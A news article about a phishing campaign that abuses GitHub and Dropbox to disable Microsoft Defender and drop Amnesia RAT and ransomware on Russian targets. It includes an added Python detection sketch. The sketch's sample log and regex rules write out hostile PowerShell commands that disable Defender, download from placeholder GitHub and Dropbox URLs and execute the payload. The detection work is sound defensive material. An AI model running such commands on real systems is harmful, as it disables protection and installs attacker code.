Multi-Stage Phishing Campaign Targets Russia with Amnesia RAT and Ransomware
25.01.2026

A multi-stage phishing campaign targeting Russia abuses GitHub and Dropbox to disable Microsoft Defender and deploy Amnesia RAT and ransomware.
Russia just got hit with a nasty multi-stage phishing op
Hackers are weaponizing GitHub and Dropbox to bypass defenses and drop Amnesia RAT + ransomware on Russian targets. This isn't your average phishing email — it's a surgical strike designed to disable Microsoft Defender before deploying the payload.

The campaign starts with a phishing email containing a malicious link. When clicked, it downloads a PowerShell script from GitHub that disables Microsoft Defender's real-time protection. Once defenses are down, the script pulls the Amnesia RAT from Dropbox and executes it.
Amnesia RAT gives attackers full remote access to compromised systems — think keylogging, screen capturing, file exfiltration, and command execution. But they didn't stop there. The same infrastructure deploys ransomware to encrypt files and demand payment, doubling the damage.
- Phishing email with malicious link
- PowerShell script from GitHub disables Microsoft Defender
- Amnesia RAT downloaded from Dropbox
- Ransomware deployed via same chain
- Targets specifically in Russia
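The chain above (Defender tampering, a download from GitHub or Dropbox, then execution) is easiest to spot when the steps are correlated per host rather than alerted on one at a time. The following is an added detection sketch, not code from the article or from any vendor: it scores PowerShell script-block log text (the kind recorded as Event ID 4104) per host over a constructed sample log. Rule names, the sample lines and the `EXAMPLE` URL paths are assumptions made for illustration.

```python
"""Correlate per-host PowerShell script-block log entries for the
Defender-tamper -> cloud download -> execute chain described above."""
import re
from collections import defaultdict

# Rule names are mine; patterns cover the behaviours the article describes
# and are deliberately not an exhaustive signature set.
RULES = [
    ("defender_tamper", re.compile(r"Set-MpPreference\s+-Disable\w+|Add-MpPreference\s+-ExclusionPath", re.I)),
    ("github_download", re.compile(r"raw\.githubusercontent\.com|github\.com/[^\s'\"]+/releases", re.I)),
    ("dropbox_download", re.compile(r"dropbox\.com/[^\s'\"]+\?dl=1|dl\.dropboxusercontent\.com", re.I)),
    ("download_cmdlet", re.compile(r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Start-BitsTransfer", re.I)),
    ("execution", re.compile(r"Start-Process|Invoke-Expression|\biex\b", re.I)),
]

# Constructed sample log: (host, script-block text). Not real telemetry.
SAMPLE_LOG = [
    ("WS-01", "Get-ChildItem C:\\Users\\alice\\Documents"),
    ("WS-02", "Set-MpPreference -DisableRealtimeMonitoring $true"),
    ("WS-02", "Invoke-WebRequest https://raw.githubusercontent.com/EXAMPLE/EXAMPLE/s.ps1 -OutFile $env:TEMP\\s.ps1"),
    ("WS-02", "Invoke-WebRequest https://www.dropbox.com/s/EXAMPLE/upd.exe?dl=1 -OutFile $env:TEMP\\upd.exe"),
    ("WS-02", "Start-Process $env:TEMP\\upd.exe"),
    ("WS-03", "Invoke-WebRequest https://raw.githubusercontent.com/EXAMPLE/tool/install.ps1 -OutFile i.ps1"),
]

def match_rules(text):
    """Return the set of rule names whose pattern occurs in one log entry."""
    return {name for name, rx in RULES if rx.search(text)}

def score_hosts(entries):
    """Aggregate rule hits per host. 'chain' requires Defender tampering plus a
    GitHub/Dropbox download plus execution on the same host; a lone tamper or
    cloud download is only 'suspicious' (admins and installers do both)."""
    hits = defaultdict(set)
    for host, text in entries:
        hits[host] |= match_rules(text)
    verdicts = {}
    for host, names in hits.items():
        cloud = names & {"github_download", "dropbox_download"}
        if "defender_tamper" in names and cloud and "execution" in names:
            verdicts[host] = "chain"
        elif "defender_tamper" in names or cloud:
            verdicts[host] = "suspicious"
        else:
            verdicts[host] = "benign"
    return verdicts, dict(hits)

if __name__ == "__main__":
    verdicts, hits = score_hosts(SAMPLE_LOG)
    for host in sorted(verdicts):
        print(host, verdicts[host], sorted(hits[host]))
```

In production the correlation window would be bounded in time and the verdict fed to the case system; the per-host aggregation is the part that separates this chain from ordinary admin activity.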
This attack chain shows how threat actors are evolving beyond simple malware attachments. By abusing legitimate services like GitHub and Dropbox, they're making detection harder and increasing the success rate of their campaigns.
Security researchers tracking this campaign note the sophisticated use of living-off-the-land techniques (LOLbins) and the clear targeting of Russian entities. The combination of remote access and ransomware suggests either data theft or disruptive intent — or both.

